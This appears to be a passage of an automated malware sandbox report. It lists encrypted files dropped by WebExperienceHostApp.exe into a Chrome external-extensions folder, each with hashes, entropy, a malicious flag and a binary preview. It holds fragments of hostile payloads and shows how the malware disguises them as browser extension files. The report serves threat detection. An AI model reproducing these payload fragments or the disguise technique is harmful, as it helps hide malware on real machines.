SHA-256:	32BF3248625803FC2DDDF4768C161524ABDBBEF37AFE2318D1C92744397957BF
SHA-512:	E2482AE0BB95261387E696D9B007BBC956F9BBF6BB79388143A89778D387FAA9CFD3309DFEB80AAFE32EC8E7B3D0417F9CCB161B4314CF5ED821AEDF1FFE799E
Malicious:	true
Preview:	."h.....(h..".....iiR...........:..N.=V(Z.t..dS...y..cw...L.b.x.;DGk....&..&....I...#.+.K..PB.)s..\.B..A.[fa-F...CrC3...E..ps5.)./.k..Wo..V.....b...$....z.X.=%]..c.....<...9....;.C./....`.f..L. _......... }=\I..\|,H.,.........s(..DK.2.-.[...J..Vd.....4..0.:....!....k..f..(t..+..O.wl.7....y...5.GWJp/.>..\|..};..w..C[k@...........02..jt....b!..MtU.......3........a....q%_..s...;D,.[7..A[-.(\IB~.+.\..\|...........R.i....@.I.)...`...E..g...9......".$".Z.b}..:E.=.+ze......S.p5.../.\|........cC...X....<...S HH....9G..U2..r..1..e....}.g.P......p..u"...F.........d..E>+U..g.\|.....-.K....".+O..C..d..xr..................R./ix.z.I~jRrTn....Hz7>..:.i ..Q...$T...X.].D?......d....K.he....N....&...tD.N3.Jj.C=..A=..?".=..c.m..e...!#..[.{.a.m.~....^...G'C.on.c.M...$4?6_...k.k.0..#F.B...W.R...{.GJ/._.In'Y#...z..E5vm.B........N..y.>.....-]...2QW.dH..5L....;..J.ZP%UxW!n7z..).\xi..H.U......I8.......7t....l.+.yDr......Q..`R%7.r.d..}._...P..E.g..I....D{Wvd..I).

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.86

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	data
Category:	dropped
Size (bytes):	86805
Entropy (8bit):	7.997904103001202
Encrypted:	true
SSDEEP:	1536:aV/Ff4ExhI6jiD4MeXZdOY2R4QZAZz9JRIHFt+PvmNd511wHg0w:qFf4qHjVdOESAZz9J6tovwLDP
MD5:	22C3A8BB3F94A4C21EE985A6FC23FA50
SHA1:	46DD8FEE82281B00178561C101A8F782F828ABE8
SHA-256:	AFAC25E01A51ABC1CB4D84D6366E773C2F20F51198AE7208ED2A668FF52045ED
SHA-512:	C1047ACFCDB567958D06F2807DBAD5192A6F6053F85F67D32CC73A6960D5C0DB4D49550403FB63EB9EE396A244B46F4BEA11D6C6AA699B179F023B3CB325F763
Malicious:	true
Preview:	.m.@.........!...&z.XIU.~.....\|...m..%b.djc.....xC....Bz.{w..]n......;qB/.e.Mn^.4...z...h..c5.aB.{.Q3.$. l<h..G.y`.k..1C......Z=5.C0..l...k..!.%.+..k.LxK8...d.z....P.'..r.....).....l...6..p......P........i..;.\...r..Z..O.d.Z......3...P....c{..#....}w.Z.u.M...Q.!...{....B.....&.Z.+Z..J.p.R.&g2..!<........UxG....!.'.....p...X.,....)N.......Q.CMS....:......._:.....k....$.z.3..m.[Al...OD../........t;..........-..^..b.yM......X..Sy.w.;.6M.5.......fM&c.....$vPT.l.............EE.5..../.8....;e.....7...l..{/..e..wb.54z.B8\w.%.].V..q.N.o.\|..,.xYlhT.'_.K.p).Hn..2C.....0...3..g.y..3....O.FL.G.F@a......;].~.T..:.......jx.\.-.....?M.......Q.......<.....?..^0)..2.p..n..-.]......]..L.6.h3.K.S`'/X...sO.p..Q....T.f3. ;.._..V..T..0i..a..\.A.Y....E......{E.....U.........k\|.P..MF.;\|.A.Y.(...U..'^T.........Hn.........U.[6..`?]..?....@.\|.O.>..d.b.....u...\...T.r...'..W..!..m....@1{.<.H..A........p......q...mn.pAY.F(;b#....B\|\|.f...1.~.DX..............C.

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.87

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	data
Category:	dropped
Size (bytes):	94575
Entropy (8bit):	7.9977207538456065
Encrypted:	true
SSDEEP:	1536:yDJZaWA/FVGS7WTEYK1Nz0T2eTbvE6TXYhDXDNEcfsPcHPKTsbpdHc50YPlgM6JK:SJZapFAoJXET2eTbvxI5vsP5gplcHdsK
MD5:	CD0D394C2541D93A5FF9651E29B418EA
SHA1:	8A957D76714B485E751AE04DE7D741067986CF0D
SHA-256:	FAA6264780990444CE118C91A60FAED90326444333E29224A223384E4A114AB3
SHA-512:	DF1A28F8B18F7F49F119488325E6F39F7909B630CF6A9D20ED85EA5A7F385F7773A2E5C9D1C83800B68BDDE3C37CAA00FE6206B83FF7BF0B6E01E81D30D729D7
Malicious:	true
Preview:	..}.m_.c...'..sJ...BE?..q.x......\..~....%.Y..%..pDN..."....,........g.V...".C....&..s:.s.......m....u...8.<w...q.U....m.V.#./.......:^.......N..a.[.z.i..>.i.#.A.74.D4........-.u.;....9<U...... ...fF^......=M.B..xS...F...f..+..{.. I.sx....h.\s`....i.W...]v....VL7.......b............H....fsCn.#=..q...C....mvX....6..R..{..S0=....P...g.......&....{.KOld...;60N\8r.b........)I.e9"k.,~w .....r-x...k../...f.,.....x.......8w.K..2sf...j.{......Gue...%9.......w.tR..,jjb.agk..0....IX%/...9y..4.e.v\|i..m..+^j.....~.[=.C....f..}...........9.G.......k.\|".Z.it.`......I.Q.4..D.e.G^.0G....H.....F....<...p....0.../...kO.M.e.j.".P<:..g./....3.<....1..I..$. ..?.ZXP.^...9_.@.+......+...(.xY...:...R.2..d..&...5.L.....r..T.\.....C..."X..N.73.g.i(...54.F..,H(Y.7..gw.Qk......M..z.z(.3G...'....Z......^.lq.6.D..s...$...=...N.V50.....94 .....l.....c.....i..P....7.W...8.u....%V...s.:`...A./...."j....p.W.M....'....Z....-.....x..._..$..".z.@f..Gav..MTL.v....L.....

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.88

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	data
Category:	dropped
Size (bytes):	30090
Entropy (8bit):	7.992994224587034
Encrypted:	true
SSDEEP:	768:atLQILl8MIZcfii/4czvoyposUaz5u+1x:atLh2K9/4czRpxUazg+H
MD5:	DF4ACFEDC75F132012DAA6F6BB41947F
SHA1:	9F9FCCB55311FD4BB0FFAD4E77038222975D2C61
SHA-256:	724CD78929DAD83B3E2CA0FC1795E7B347D1A7547854F1691E18F61A333EB596
SHA-512:	4AA1103F3E209D5BF4C579CD64CDB690EBDBFD83A722AED84698286389686DF580F2FB2C3DEA85477B78230F34941D2C8EB8B17B91853EA455D4003FDCC1FC86
Malicious:	true
Preview:	r.K....t8.....=.`........,.....#.-....(.v8+o..4......Tm..[.'=K.=.Y.....[?i...:W.E9Q...B....($. ..t.."...'....wb...B.E...:a.\|......=...3q.OA.t......t^..=...u./y.\.p\N.!..V..XY.#.M`..O.(........6..)p.6>'..^S.....I...\.2....\.L1l.....7..y>.V#.]b$O.....P.d.2...)..A.r..\..Tz......0........C>\.5....+.5./.e........+.#.n...9.)....$O..I..5..K..~......Z)...mL...}.rx..8.....=...]<.......sfkKc.5.1rc9.B..B..~g...a>..:s.B\|.zU.9..[NJ2^.\|...%..;.u@..5.A..n.+n..q...s.(<.1q...F.K....w.Z:..u..jD.......K...)...1G....c%sz.......$/.2.L..n..B>..&..^.....Xp.q..].N.tM.fm..n...[K=.S.../".=b.&..w~@...,v..-H..6..+......-.h........:\|.?&......c....l(H.lP......z...x..Q\|R.u_.&......O....MrX...?.@..%.]\|5..H....Y.....m.#@T.2\|.0.o.7.9.,X.e.%.h..!5.H...<.vw.<)..;...B..X....a.%..9_$(b"....3Y..m. .....Y...v.e....Cm.O..P.....@.D.0m.+.T4...5...l....p..U.X@...U...g.........A3s...YM_.eu}km....{...B....u.GcN..:fB/..".>.$..J...o..e.}.koM..p.b....Fb.....82.4.".O..B^.G

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.89

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	data
Category:	dropped
Size (bytes):	100848
Entropy (8bit):	7.998369976636654
Encrypted:	true
SSDEEP:	1536:m7KhBLzfCjzS2FpX6XhaUM+fvZRVczMtoYiaQ6FDExNPdjmgCvrpcIfVUBP:mm3+3zpX4snSV2MyYiF6NKOdjpccVqP
MD5:	AFAEAB53E11D67FB43EEA65E3CB82FCA
SHA1:	102FD30B94F1072E3F0C7D73E76F258E1F2A0001
SHA-256:	227CD283ECFEAD810EC11E444E571C8058568671E2A3D260C963F31B09D5D7A1
SHA-512:	D88AE8F2B69F210D7D6FB230A2692463D23424962F8BB20E49124F5D5E3A9D7E7005AD04B712F4EFDBAE1AA806A7DDB9BDDF595D923637C8B3938209D9C4580F
Malicious:	true
Preview:	..).........\...FR.KM...E.....A.X..j"..Q.... .....ncx.....b".f..nek..G...Q.....C.j\..p.p.{..+..D....$.....<.Mj.;.}.u..-..D.".....K.u.Rj...h\|/zA..[B...[".hf.m....T.N........;.V[V._%..t..<#.rE'..h}..&E_jb[...'.'.........5o..W+.+...;N./.d8..yC..+.r.......5.N.J+.x6x..L....o.A...1x.....p.V.9..N..5.....x3.%.g.}.....D.z....R....6...l.....h..2.o6'...S.....7.....O.....g........BNK...p.....J.<1\|...U..F.C..nBJn.s..:`..+~f.......9h...{...(..>.yMv......./o.Rk.....\|:D....:m..3.6.gD.^.b?.9.B.A.J....]:.f...z;..J.W3..Yw^. ...":.H?u.:.<.J<.T....?.\|]...h..a.\|^.z{7J&.h...K..4..n%.s.{..#.RE..'.Cp..r 6.^..Y."../.....fca.Yb.%....f.`.a2...P..d...X..W...A.1nG.a..c...^f.+:.@.HY`.ass}...)1.....tFX....>...8.^.RdI..."#.]D...lW..C.7.-.?._..%@...)<9...(N?J.u.r/:\..]h....$:QL^L].Dz...q....z...1....\|0h.UiL..~j{..."i.2..r......V..aK.wj.b...(~?.r.Vm.%]_..]V......$O./.-!.... ....ty....<M.N.zF...eh.....pu)s?..Syc...4>../D.....N.....1.{0..\..{.&d$...Q.g..(.eR.....X._7........\|m

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.9

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	data
Category:	dropped
Size (bytes):	108428
Entropy (8bit):	7.998127695945678
Encrypted:	true
SSDEEP:	3072:NnvyPCeFLI9z/1n9n+YlOazl82sL2ZNTYsfd:gCemnn9+YoUl8baZNTYsfd
MD5:	38F750CA8823977655F9BD61F0D1E405
SHA1:	2191FA88948D734A364A295F1A085ADE66CA9B58
SHA-256:	9F0C95336E7C78312FC24E0A89F1E21F73317D2237875806F4EC354525444804
SHA-512:	ED024D1277CA23079C92530A130FF99A49D41043AEE1F60CAAD2EA9F3F73EF55A240CFC90A0F3EC0CB1941D669C543DC9D84ADC2238F73A146CE84312227A078
Malicious:	true
Preview:	.o:l..T^.w..&...O..,0o.............)k..S.XY....w...7~...3.....b.i...."0/..TR#"t.r.<.wZ..T...;......U..x.w.k!..2..1....)....G.d......>.....k..RNk..p....>.I.9a.2n...6.'..4....t.{/f.-..;G...yJ..\Z:.A.]..~\.E.i.Q.5tc..!.....+.M>%.P`.f.:m.UGHFA..z.....6..UJ3..a...'O#..;%...e..A~L..J0K.J...l`lr.t/m....@A.9..G.3R.m6z+.E....~.... .a..y....s..G......K......A...G)..o...UYE.r...5!Y..y1..S..a..Ao@u.(.............5XN.3P...w..r..>...a.[.V.Jd.D6...]x.'.j5-%..Z..\%.......jn.N....4...W.d,...Nx..u..]t+.>.gnB.n$b....M.0?`...!.1.z..i..w.)........: ...>.......G.U....w...z.E......4I'z.....\|..6.....J.;..1..`,..?.......YX..I./._.:l.............!......7Qf.d.`.4~.......I...2wE.A5.]......<~r...5.?...y.w.I.0...q..<?"+..4.~...<-7..0..d.(.aZ.....^f.!O.2...Bk..E..,.3.C"h....Ck.-.(".....C.&...N.3......J..:@F....Y..l.=........%.n:.\|...w....t.....d.m.A..........J!.].=.uO~............qIf...%bA..J.z....M.]......D.u 3oU$.....h....3......jv...-.U.=..G7.rr.......

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.90

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	SysEx File -
Category:	dropped
Size (bytes):	33069
Entropy (8bit):	7.993925773002762
Encrypted:	true
SSDEEP:	768:pyxDdv06jbLxo+fkAAVxxHheaSFs1781Ns0qU3PMra+iw4:pyxnjPxLfkN6O78XsJaP5w4
MD5:	58E78B76FA5A84F006B2F933F6A83FE5
SHA1:	C3752AD73B82D2F9E5345060C3FD158B8BD1719C
SHA-256:	151B5549D182DA650EB17240295977BDD4EA1FCEC932A0790562D981617F0D00
SHA-512:	9F73BABA449ACFAE73F86C0F3F28B08D31CB285439CACC1F29164672C5E4DA0867356F2908C3FE38D67F61C2A25D4A6C906ED78D173D189700C7FA17507E10D7
Malicious:	true
Preview:	.U..s...'.c......j6.g..;#...}.X. ...(.......K..Pj.Ox....\|.....KX.).e...d&..$..v.I8.oi.1..MD...p....:..4H{....../.q.....-l.u.3..\......6...d....0..IA..L.........-..V.V...x..."....TI..n,.0J1;.y.T`..#.gX..S.E!.9.......~.<-.8a$.;T'.I........:9#X...H..K7&.8.4....w..h..h.[].k............C.L......@"...;w}...O'.w..]YF.1......@\$.YK.QA.G..`...5xO......]...rK{^.D.;.........m..}..2...a_...9`-`.s=.X`.wS..EW....l......<...^....H.......'<.%.....\yhB.'...S...&..X....c.#w.....5N[..;).P..M...{...4.U.9..:..2.4...g............}..'..~Y.vc.Z...~.k4....;.r..h..!.6....x.....a..q........l.....+>.-..~D/.!>.L...?.+.l...\|%...D..#..k...0....gj..:.!.+..z..?H.....\|...6l?..n.M.yI.{NK..:ZW.L^8.=.h...g.....J.F....?yB.oM....H.un.U5....r.P.#i...,......].J`....b..<........m.............._..K.s;..U.l....~.5?.......#..;..x....D!4@...x..hg.iF4]wg.4;.vt.;\|..P'g....9~.:........b.Wk..hl.Z...}G..d-..:....Tz.dL0aA..C..!.....E...W<....n...=.h...;m.~..7"..a.0.uzu....._...

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.91

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	data
Category:	dropped
Size (bytes):	54007
Entropy (8bit):	7.996688250578679
Encrypted:	true
SSDEEP:	1536:4tly2UfwKToAZoNUB86cxCFPfNRYBDOIF0VHvg1PLdLaic:WUfwKTfoNc86cgpYBDQVcPLd6
MD5:	89E443702267165FBAE87AF26C939C18
SHA1:	5029D14361733424BE9F6A6E1B6F2BB57653ACF9
SHA-256:	23F0FD815D5A569779089212EDF6060C4326D15F589A5BC25136BA192BAC3A84
SHA-512:	E5F9A8C8E00847AB66A72F1530CBF8964EE1F94FD6A8114B8D9F0504404162CAFBB67BDE3F393F9B8B4C4CFA5A690E8C52E4BF9245F3F70FAB99B9D6789E60A1
Malicious:	true
Preview:	1+...+y.=b.;....-Y..F..Kz(.D".DBt...s.$.v.j....#{.....4)\1>N^..e...UgNF.p.....TX.>.=....-...1z...+..1..rv.].K..~.R=k...?_m...^O.......%.:....,5j..\|..U6.....$..V.u..y...hG.x..y-.[oX.\.....<..z.YUkUUI&.k...)(J..e....G..E.#.(k.5...se.....J..4P~."..@..f.....>........{......./D./.).......>.,....=.J..Yh3..r..%.nY"..X.V.....\|h!...w..=.{e....#....ltj..tK..St.%.L.P.3.8a......S?_5...6....&.y9..Ac..9.....C..v...^....!.o2B..c..5>H.8.D.a.u......Y._+.\....V....@0L3...f.H..!.i.nso..\...u.......g."_L&RT.._SLB_..c..Y2...=O4...b..80.Ud...Ds..S.q1EuB_.{..y.,....@.iq!..3\.V..Zw....../.}6Q...}n.......$........e...u...j.U....;Ao.d.o..Aeo-.q...e......s.s....7\K=........N.ggf/.0.7.D{y...b,..y.,.hB.>..&.l.....vC{h.iP.M3w..D>....S.j..o.^<b...Yb^..x~.ox.pWb..Y./c..,J..~..B..j....n..B;y..>..w..:J.HM.....a...X%.~7.d..xi.(....:.Hp....^c.n..Y%Vd.....?....Ef..Z....{..r....,/T...3O...k...dy.C9[[..)3.Z ..8...C...:...@.]hJ?@.".<..2.?*!.[../..Z6...'F..QE'....

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.92

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	data
Category:	dropped
Size (bytes):	101889
Entropy (8bit):	7.998101540203829
Encrypted:	true
SSDEEP:	3072:F+k1vLojmdohZdLA4ynukBMk9yu+gl2SaV:F/9Whcak9yu+2xaV
MD5:	F798328E8E146EE0F21494DFED694087
SHA1:	9259DC61933E9DE1C0D8586E632FD7C504DE5AF9
SHA-256:	7BD6D8C54EE016BD3B543F1B960AD63544E0223FFE1472BD7533E05C3EF8F4C9
SHA-512:	F85F4EEA09A19AF2E25257119B8D91373F55D891D4BEA002C48EDAA5660895DA631F84EF45B5CD5430196B1606DF6782F34433A8D9F3D2244D78EBF682AE307F
Malicious:	true
Preview:	...,v....,....h$.e.J".....f......l.<.Z..9E.~F..Dk.4.O=..M.....[K(.m..yS.\....L.j>~.@...B..........o..8..f......r\|pc.......!..OP.b..n...y.-t..8..90.......W..^.s..H.fL.V+4?Z^..........].4u{2W.zG.M.(... y.....Hyw9n>.2JN.t...D}U.b.^..z.....r(...j2...('.,b.{.V{....t.4]r..(........>.\.H.......A.G. ..}-...o-..\...Qso..d..Np...Z"..Uq..j.g.L...J..h..'..C(.E..^.c$...E..>..K'$U....j`k.6Pn4...S./[.........^hVZ....2..P{..03.Vij.(..f[....%&....6.....%..i&. .....}.f.\|....,.-._.....(\|.....u..+)...........+g..l.....i......[.^....nbe.Y.>...'.....l4.7.E."U.S9 L...L.HU8.w.s..yf......n...2S.IE...R.i,...a..O..c.^_)@N.....C\|d{.[..$>.."...!.Z%....#.,+)q.0.U....@6...y.a..Vywl.../.S...j............\|b..&#.V..8............2Zf..tE.Fx...J..C..Z.+.....H........cVT..8f.....G j.[..L.#H..+T...85...)....l%R,.}.X.*./7.([..2?BQ...5@.n.D;..Y........s...)1..W..A...#...UV...<.[-..S.Q^xJ.g.3u._F6...........;8....u'...@.6...F[.....#.......P.Y.e..A....i..].....E..<./

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.93

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	data
Category:	dropped
Size (bytes):	36160
Entropy (8bit):	7.99479992522762
Encrypted:	true
SSDEEP:	768:zgNu58OFEQqW0znq7mgQgQNNtATfIidF96DFes+oreMBR7:zgN3OaQgznhCff6kqrhR7
MD5:	217C230519DF70F807C75FB7A05083E2
SHA1:	5628299890E30BAC625A08A47F3F8AD6011CA394
SHA-256:	E2C1D1DB42BCB737B7E9F628CA095783949002A77A0ABB4318E0C020CC0C6B20
SHA-512:	D09A8606BFCF473D7305947D3142F145F29AAB2A3798915017510A708EDBF314394D415A0E8B54ECCE799B5C335254CAD16AE3280286C7342764B215BCF484CA
Malicious:	true
Preview:	.....M.&....{.up....P.L.n....6B.[.....]....V..P\|.W.F..,.3....#......1.!6!.].P@....R.m.F0,.;%.i][.qI..B.....].}r...:....J..u.2.]9H.=T.$H:.........L.....x......h1.t'M..Q[......b^.{.0M....4.&.v...c\tR.F......d...y/../..;.PE.r..:.X}..tc....0N..V..RqZ...w}.z.i...c..d9.0K.L........+....3p..4......l...K.gC.p..z.S.o......R.M..~/S.<$a(/F.l.T..T.?`.B<.........X.u......S.S........[.a@...n.....,....(e....$....+H........g...f..._....1.....f.....]..w...!}w..#.....m0fk..'R........r.-.m...h}..>.b.vx.NX0...gK..!...\......L...jn;..&L.....j..<e.S.MG{M...........j.}.Y.=..Ne....bV.V....kx..VE..#<9...:<v.r./..RY...r\|i.....<........G..-.....`&H1..{....T;...S...5.e.....V.....t.?vSyG..P\.....?.q.....<o....fJ.d..47...5e-+~>.!d.+k..-..~..[.V....{..ZU....\...a.b...+.e..7...j......b.!.M3........A.b...O.Q4......#.].>..4.1.U.....0.P.m...).lCl&;rv..#..*..Z.;4xm..s..^{..w.c.o..w.A.).Zm@....@..>..B...X..J.".>p..M.'D.e.m.F.......J.Q..3.....[.+x.e...'.gd....Jx..B..+

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.94

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	data
Category:	dropped
Size (bytes):	106396
Entropy (8bit):	7.998067864727535
Encrypted:	true
SSDEEP:	3072:qM37hIVrxhOGOQQnmQ1ITmxzq0LayAixElw:J37YhOGOQAH1rxzl+yAixp
MD5:	6185A27AF47F65502F8D4C2B4BC1FA86
SHA1:	391B549D775674B084948D22C2F04D8A1A4710D3
SHA-256:	DBC6E143113C467818082DFA9E951F1371EE76371D27B601C34137138BF4D20B
SHA-512:	7612334D4F70D5E4225F1D083989A20B20B4C0DBE3FC99546E904D51A2743EA3DB6E1D748E5649D432163006F5008E01EAE2541ABF0C22F68C5834721C8B7E88
Malicious:	true
Preview:	...az...1E9.$:S....._+. ..z....VR.2U\.X.t.B..J..x.=.4....%...............O..T97.8@...9NM...........Bj,.)f!.u.g.<...o...&..SXU...'.d..f.Guy.6...?te+........).....D$....JWL...,..r...r...k."X....`H`.rq.i...<......iB.w.i...$...Z6.P.~$..dP..J.....b..qC.........._~Ug..KV...)H.\|.z_.(..y..a...'.....m...........r......{.l.n4.....Q.-t....c6.K...u...~...D..0......dC....h^@o...c.'s../.."...6..d..4...aN.\.p.:eK....#O...r4$Z.nuOG...C...2uKLl...!.......8.'...d....k.QT-.QD..._......k..4A.../'..)....L..N...$.w..f.Nm..GJ.N..q.\|N..w..W.F.j........(&.`^.m.F.5...m\..0...`..#gP....s.3...4.B..W..3....Z.\...h.Sr6.d>.>J..H..'.d.T..Pm.s....(.V..B.Z.._.6.yg".C.D'^..9~R...&g[.qN.............2B.._...J...<..vY=.4..]\...=K...&...rB./1C..A.t.o......G..mK.E.1.... !N.....!..W.I.u@......=...e!.!.+.@......q.V..9?.@...H...^.kc.'.<.F.7......Q...).[\.=.+*(.1.....]P...$...d.[Zru...J.tu.:+v.s.@.4..[.......Z..9..O.......qZS.f.;.,....5G.-.p....T.....C#..$#.0:....

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.95

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	data
Category:	dropped
Size (bytes):	39593
Entropy (8bit):	7.995031825226503
Encrypted:	true
SSDEEP:	768:S/R/jO3pGVwBF20lNBVfwXIpNzBToHSfbu4SAvUN/pzSUx67//yFF:MRrO3KqBeKWSn7WF
MD5:	4B066D38DBCF6B34DAC79FDF1D8B61A2
SHA1:	83F441ABC5E495FD1086008DE529640F2C21F346
SHA-256:	3A76ECE7B42A78424B5E9866BB2820AF870622B8F9B5CD84711029126673BC08
SHA-512:	9099B67AE5A0CFE2235C440DFF4A72FC5D527374A8E558B00F2EA935401838073A4F9F7D6C7C6A5DE8C899993F35C3C8881E2C263A20332D036A3493B307730E
Malicious:	true
Preview:	M.......EO......R.....7.3Z.....j...,qZ.X....).'..>s......j...U....=@.@......i.."....?t...l...0K.Ma.<..}s....P{/..\|..._..T...;.._.{.@V..`~.v..l.....G....r.o.....s.;.&.D@.%Q%."../...<..n.$...o;{OO..C}..5..H...bw....6.7Q@.....Y......]t#.h8v..0.....M.}ei.3n...vK.....m.mT...\.v....k.......sp...mz....O..>.mfb.%.......<......d.Z...X.E...C....b..L.l..1..5.^..!q..6q......6.....}$..Q".....m...~.U...!k..%........6.v,..t.......Z..I9@B.q...u.j.b;....WP....Vo...IX.\|.........0.A.N.TIlm..@J7.?.N..6.+..x.n..l6...C;k~F.......V7.Lk....].....^__.va...aHd.j5/.8O?....X9..#.-q.v..E...z..........^..]D.}x....M.f......W..5X[..9.<,...QB.W.....Y..v.qM.(.L..p......y...O.....,s3q..-.[..%...'.EX.....<.`o..,...0.kK.:...._....'T..m........{.0Z..1..).P..MQ..O..(....p&2-k..`...z...L......5.\|.e...53E.....o.._6H_+...j.{..;.......U/3C..A.=.5 ...x..AO7fv.Y.\|......r..4N.E..\.d.....I.W..Bn../)^t..$.bBC..z!_v ...8....k.[+Q.e..]L.t3.......,.L..d..Jy4.....p..7......B

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.96

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	data
Category:	dropped
Size (bytes):	90014
Entropy (8bit):	7.998209516743823
Encrypted:	true
SSDEEP:	1536:qf6fRCL8yUFSwdbx/xsgwonwHSAnZEbn7T73l/hXASqURe4iJbA+7zx:zfMLfiSwv5wonOSASn7TTl5wKe4Izx
MD5:	35C1E7A53DD23C00ACCE2DA7FBB754D3
SHA1:	159A471D00F72014352CF1F40FECEBDEB1FAA5EB
SHA-256:	73F0DA73F1712849AA9878FE0C6442121350BA928632D7C20D99548740D58A55
SHA-512:	417C1F00399363F653B3B011317FDDB7BAD5238899EFB404699344B4AF484AA0F97F6BE2117CFE3ECC2BE2ADDD9DBF16837CA6D541D57653AE0AB10AF1991075
Malicious:	true
Preview:	....r=.B...u8..Q.b......Tv...l..e.J....%..T[....."...u.."..&\|yJ...,...a.N.Q.-..)...d.....,Q..z....u....p%..6.Ho...#O...g.c./..v..\ A.../....g...;_.......wE..b7h..x...P.>.~...Y.D...t.U.p.....h...W.......K.>mT...=_...q..\| .-...6s5....5........~jg...{..1-.wF4.B&7FO.......6%.....+..Y..;.....r.9....../..}..n...B>_...R?~.'{`.B.aT...2p\|..b.....ME........F.F..S...".-..V;...+.mr#..E....r..m....3.J....(O..+........3.yMG..\...........\|.gh..;.J....F.T...+Oz..w.......y...+.5...!....4ww.".l...:e;P..S...qY.~.A...c.[rNz..d..w.[.8.......U.>?=...1.=d.p..>2#.u.:..\.1...X..7.EUce.U_6z........./W%..}..K. ....O#..[....x.;"...........i....Kg..=t.k..K...j.L.....U(......$.rO.t..".7..5r..o.7.U\..&..,m.\|lH`...d/.0...V...Y.L...}.J..'...l1n...T.@h..?.i.uo[0G<...................B.pe..3..>]wZ..$.:.n!......K.........\..]..v..l.5......A.ydT5..`..M..Cpx..{.{..fr.........f.v....:...@pB.+...>L...I;:,)....?j....f.=l*..A....Si.U..UT..hD.$T.u..lR..f......Q$0".Z.

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.97

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	data
Category:	dropped
Size (bytes):	32520
Entropy (8bit):	7.993661924408125
Encrypted:	true
SSDEEP:	768:FWmEF2vB3mkeGVFdd/s2WKI30gWG1hAbbbo4B2rTi2dwEVhVJ:22vB3mkeGVfFdTi0gSHog2S2eEbVJ
MD5:	DE65F5463326EEE43A9AB108DED94C53
SHA1:	F7BBE75610DC317D897040AC5DB4041B3C16BF36
SHA-256:	35BC57819FAD6E61CD0819EE5EEDB827251D83FEB23E809D2CD746A36C5ECEF7
SHA-512:	EDA61A322A4AEAB9138DE8FEF4BCA8E5ED5EAADF5C50573E05E15BE94EBA72179D225D4DC7606F6A8055C9942F05A8E1013B3F009C813DCAD33F5DC405895DFE
Malicious:	true
Preview:	C.,n..7.L+.'.....c./.. 8....\U....cc.a.v....3Z.!...w.DE.Jv.@.Z^l....`.J7?...E\|b).....(pG.......p......oD.~..l...h....^./.Ee'>.U-.$^0.Q......8.........s.8QJ..R;.g...............'..9.VG.....p...e.U.`.....(....m.\.x...o...N.X.T..zh.;....F..0..7f.N0..".....=Ua.pK5.g>c.gN..w.y....`...Ok.R.....L.'M._...I^.4.%{....gL......8..;A.../.E"..._.....:.0.1..L1.C.....-.....4........%...?....W=t.{\|!..~.a.G.....J._v.)..e....{/n....?m.%2......w.x=.4..D....Q..F..{F..r..W&Zm.8..bQ.....+.~.....lZ..WO.h.?.o..#.F.F.$..4...2.kz ....\|].v[0......iMX_\..T!..9........\|]..R.<c.B.Bn....N..N2...v?=(....&..p.S.<.........\|e.-t.I5w;~.h+x..p..=-y.si.9.?.....J.->l...].2..g...ia..M...`.Ac.....w..."........6...s.gF5..y..ks. .p.g.-..z,?....I.`.@..z..ht.....Q..."qRJ......f...G.O..x..y<.....S.........C..!...;.....g..Fz2.75../i.2..4[.\.q....'8Z.:\|5..]..Z.p.......zB.Gm.M.I`...7...7........C..;...S.(.......M9.....SJ^...K..C.k.M....V.uk..e..'...$.ZNi..yU4.4...^......h

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.98

Download File

Process:	C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe
File Type:	data
Category:	dropped
Size (bytes):	100966
Entropy (8bit):	7.998412085921912
Encrypted:	true
SSDEEP:	3072:lG5ZPA2Ei0Glgejn7T8TCuIO5p6H6+cRJXEo+RMdxBJ:UZPd10GfneCXO5YcX00d
MD5:	F55E7B7AF6071C10547C54D62204B475
SHA1:	E036BEF92DFF196F6423F7B0C094F634DCC0DEF7
SHA-256:	B862442376861EDA141DF226A952D35FB5E82AB127AD090C81EC46FF8CE33A0C
SHA-512:	544492FBC7B42B400C664B27033F3EF212C261290B857408258BDBB3C3DF6D0C01D8585D4D2BE6133E15B90096230EF289164BF025B1FE0B5A66452FAA28F4EF
Malicious:	true
